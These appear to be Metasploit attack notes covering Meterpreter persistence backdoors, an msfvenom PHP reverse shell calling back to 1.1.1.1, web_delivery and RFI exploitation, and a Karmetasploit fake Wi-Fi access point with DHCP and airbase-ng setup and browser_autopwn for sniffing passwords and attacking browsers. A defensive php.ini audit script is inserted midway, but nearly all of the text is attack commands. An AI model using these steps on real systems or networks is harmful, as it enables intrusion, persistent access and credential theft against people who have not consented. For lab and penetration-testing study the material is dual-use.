Persistent backdoors
- Meterpreter backdoor
- run exploit/windows/local/persistence
- run persistence -X
Extended usage
Mimikatz
PHP shell
- msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
- Place a.php on the target machine's web site
- meterpreter > use multi/handler
- set payload php/meterpreter/reverse_tcp
- run
- When the PHP page is visited, the reverse shell is triggered
Web Delivery
- Uses a code-execution vulnerability to make the target reach the attacker's server
- use exploit/multi/script/web_delivery
- set target 1
- php -d allow_url_fopen=true -r
RFI (remote file inclusion)
- vi /etc/php5/cgi/php.ini
- allow_url_fopen=On
- allow_url_include=On
- use exploit/unix/webapp/php_include
- set RHOST
- set PATH /dvwa/vulnerabilities/fi/
- set PHPURI /?page=XXpathXX
- set HEADERS
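As an added defensive check that is not part of the original notes, the following Python script audits php.ini text for the two directives the RFI section above switches on and reports which are effectively enabled. The sample ini strings are constructed, and PHP's stock defaults (allow_url_fopen On, allow_url_include Off) are assumed when a directive is absent.

```python
# Directives the RFI section above turns on. The value is PHP's built-in
# default when the directive is absent from php.ini (assumption: stock PHP).
RISKY_DIRECTIVES = {"allow_url_fopen": True, "allow_url_include": False}
TRUE_VALUES = {"1", "on", "true", "yes"}


def parse_php_ini(text: str) -> dict:
    """Map directive -> value, ignoring ';' comments and [section] headers."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # php.ini comments start with ';'
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings


def audit_php_ini(text: str) -> list:
    """Return the risky directives that are effectively enabled."""
    settings = parse_php_ini(text)
    findings = []
    for directive, default in RISKY_DIRECTIVES.items():
        if directive in settings:
            enabled = settings[directive] in TRUE_VALUES
            source = f"set to '{settings[directive]}'"
        else:
            enabled = default
            source = "not set, PHP default applies"
        if enabled:
            findings.append(f"{directive} is enabled ({source})")
    return findings


# Constructed sample configs (hypothetical, not from any real host).
WEAK_INI = """[PHP]
; a commented-out line must be ignored: allow_url_fopen=Off
allow_url_fopen=On
allow_url_include=On
"""
HARDENED_INI = """[PHP]
allow_url_fopen = Off
allow_url_include = Off
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_php_ini(ini) or ["no risky directives enabled"])
```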
Karmetasploit
Fake AP, password sniffing, data interception, browser attacks
wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
Install the other dependencies
- gem install activerecord sqlite3-ruby
Infrastructure installation and configuration
- apt-get install isc-dhcp-server
- cat /etc/dhcp/dhcpd.conf
- option domain-name-servers 10.0.0.1; # address of the fake AP
- max-lease-time 72; # short lease so a user who drops off the network recovers quickly
- authoritative; # if we do not declare ourselves authoritative and another server does, our DHCP offers are ignored
- log-facility local7;
- subnet 10.0.0.0 netmask 255.255.255.0{
- range 10.0.0.10 10.0.0.200;
- option routers 10.0.0.1;
- option domain-name-servers 10.0.0.1; # DNS server for this subnet; can be set here if it differs from the global one
- }
Fake AP
airmon-ng start wlan0
airbase-ng -P -C 30 -e "FREE" -v wlan0mon
ifconfig -a
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
Once a device has connected
- msfconsole -q -r karma.rc_.txt
- Traffic information is visible, but the user cannot reach the internet
- gedit karma.rc_.txt
- Remove db_connect, setg and set LPORT
- Add auxiliary/server/browser_autopwn